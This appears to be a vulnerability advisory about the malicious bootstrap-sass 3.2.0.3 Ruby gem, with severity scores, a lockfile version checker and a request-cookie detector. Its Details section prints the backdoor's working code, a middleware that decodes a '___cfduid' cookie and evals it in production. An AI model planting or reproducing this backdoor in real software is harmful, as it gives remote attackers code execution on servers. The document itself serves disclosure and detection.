Malicious Package Affecting bootstrap-sass package, versions >=3.2.0.3, <3.2.0.4


0.0 critical

Snyk CVSS
  • Attack Complexity: Low
  • Confidentiality: High
  • Integrity: High
  • Availability: High

Threat Intelligence
  • Exploit Maturity: Mature
  • EPSS: 81.21% (99th percentile)

NVD: 9.8 critical
Red Hat: 9.8 critical

  • Snyk ID SNYK-RUBY-BOOTSTRAPSASS-174093
  • published 3 Apr 2019
  • disclosed 26 Mar 2019
  • credit Derek Barnes

How to fix?

Avoid using the malicious versions of bootstrap-sass.
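One way to check a project for the affected release, as an added example that is not Snyk's code and not part of the bootstrap-sass project: it parses the specs section of a Gemfile.lock (the lockfile below is a constructed sample) and reports any pinned bootstrap-sass version that falls inside the advisory's range, >=3.2.0.3 and <3.2.0.4.

```ruby
# Added example (not Snyk's or the bootstrap-sass project's code): flag a
# Gemfile.lock that pins the malicious bootstrap-sass release from this advisory.
require 'rubygems'

# Affected range as stated by the advisory: >=3.2.0.3, <3.2.0.4
MALICIOUS_RANGE = Gem::Requirement.new('>= 3.2.0.3', '< 3.2.0.4')

# Parse the "    name (version)" lines of a Gemfile.lock specs section and
# return { gem_name => [versions] }. Spec lines are indented by exactly four
# spaces; their dependency lines are indented by six and are skipped.
def lockfile_specs(lockfile_text)
  specs = Hash.new { |h, k| h[k] = [] }
  lockfile_text.each_line do |line|
    m = line.match(/\A {4}([A-Za-z0-9_.\-]+) \(([^)]+)\)\s*\z/)
    next unless m
    specs[m[1]] << m[2]
  end
  specs
end

# Return the bootstrap-sass versions in the lockfile that fall in the malicious
# range. An empty array means the lockfile is clean with respect to this advisory.
def malicious_bootstrap_sass_versions(lockfile_text)
  lockfile_specs(lockfile_text).fetch('bootstrap-sass', []).select do |v|
    MALICIOUS_RANGE.satisfied_by?(Gem::Version.new(v))
  end
end

# Constructed sample lockfile (not taken from any real project) that pins the
# malicious release.
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      autoprefixer-rails (9.4.9)
        execjs
      bootstrap-sass (3.2.0.3)
        autoprefixer-rails (>= 5.2.1)
        sassc (>= 2.0.0)
      sassc (2.0.1)
        ffi (~> 1.9)
        rake

  PLATFORMS
    ruby

  DEPENDENCIES
    bootstrap-sass (~> 3.2.0)
LOCK

if __FILE__ == $PROGRAM_NAME
  hits = malicious_bootstrap_sass_versions(SAMPLE_LOCKFILE)
  if hits.empty?
    puts 'bootstrap-sass: no malicious version pinned'
  else
    puts "bootstrap-sass #{hits.join(', ')} is in the malicious range; upgrade"
  end
end
```

To run it against a real project, replace SAMPLE_LOCKFILE with File.read('Gemfile.lock'). The check relies on Gem::Requirement rather than string comparison so that four-segment versions such as 3.2.0.3 compare correctly.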

Overview

bootstrap-sass is a Sass-powered version of Bootstrap 3, ready to drop right into your Sass powered applications.

Affected versions of this package are malicious. The file lib/active-controller/middleware.rb contains a backdoor which will enable a remote attacker to run arbitrary code on the server by decoding a specific cookie value and evaluating its content.

Details

When bootstrap-sass is required, it also loads the following malicious middleware code, which resides at lib/active-controller/middleware.rb:

begin
  require 'rack/sendfile'
  # Only activates in production, so it stays invisible in development and test.
  if Rails.env.production?
    Rack::Sendfile.tap do |r|
      # Keep the original #call reachable under the name :c ...
      r.send :alias_method, :c, :call
      # ... and replace #call with a version that inspects every request.
      r.send(:define_method, :call) do |e|
        begin
          # 'http_cookie'.upcase is 'HTTP_COOKIE': read the request's Cookie header,
          # take the value of a cookie named ___cfduid (three underscores; Cloudflare's
          # real cookie is __cfduid) and urlsafe-Base64-decode it.
          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
          # Execute the decoded string as Ruby inside the application process.
          eval(x) if x
        rescue Exception
          # Any failure is swallowed so the request is served normally.
        end
        # Delegate to the original Rack::Sendfile#call.
        c(e)
      end
    end
  end
rescue Exception
  # Also swallowed, e.g. when Rails or rack/sendfile is not loaded.
  nil
end
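The trigger described above can be detected at the edge or in request logs. The following is an added example, not Snyk's code and not from bootstrap-sass: it parses a raw Cookie header, reports any request carrying the ___cfduid cookie (three underscores, whereas Cloudflare's legitimate cookie is __cfduid), and records whether the value decodes as urlsafe Base64, which is the transformation the backdoor applies before eval. The sample headers are constructed; the encoded value is an inert marker string.

```ruby
# Added example (not Snyk's or the bootstrap-sass project's code): detect
# requests carrying the backdoor's trigger cookie.
require 'base64'

TRIGGER_COOKIE = '___cfduid' # three underscores; Cloudflare's real cookie is __cfduid

# Split a raw Cookie header into { name => value } pairs.
def parse_cookie_header(header)
  header.to_s.split(/;\s*/).each_with_object({}) do |pair, h|
    name, value = pair.split('=', 2)
    next if name.nil? || name.strip.empty?
    h[name.strip] = value.to_s.strip
  end
end

# Return nil for a request without the trigger cookie, otherwise a hash
# describing it: the raw value, whether it decodes as urlsafe Base64 (the
# same call the backdoor makes), and a printable preview of the decoded bytes.
def inspect_cookie_header(header)
  cookies = parse_cookie_header(header)
  return nil unless cookies.key?(TRIGGER_COOKIE)
  raw = cookies[TRIGGER_COOKIE]
  decoded = begin
    Base64.urlsafe_decode64(raw)
  rescue ArgumentError
    nil # not valid Base64: the backdoor would have swallowed this too
  end
  {
    cookie: raw,
    decodes: !decoded.nil?,
    # Only printable ASCII reaches the log consumer; other bytes become '.'.
    decoded_preview: decoded&.gsub(/[^[:print:]]/, '.')&.slice(0, 40)
  }
end

# Scan a list of Cookie headers; one result (or nil) per header.
def scan_headers(headers)
  headers.map { |h| inspect_cookie_header(h) }
end

# Constructed sample headers (no real traffic). The encoded value is an inert
# marker string, not code.
MARKER = Base64.urlsafe_encode64('marker-only')
SAMPLE_HEADERS = [
  '_session_id=abc123; __cfduid=d1234567890abcdef',      # legitimate Cloudflare cookie
  "_session_id=abc123; ___cfduid=#{MARKER}; theme=dark", # backdoor trigger cookie
  '___cfduid=%%%not-base64%%%'                           # trigger name, undecodable value
]

if __FILE__ == $PROGRAM_NAME
  scan_headers(SAMPLE_HEADERS).each_with_index do |result, i|
    puts result ? "header #{i}: SUSPICIOUS #{result.inspect}" : "header #{i}: ok"
  end
end
```

Any hit on the three-underscore cookie name is worth alerting on regardless of whether the value decodes, since no legitimate client sets it; the decode result only helps triage.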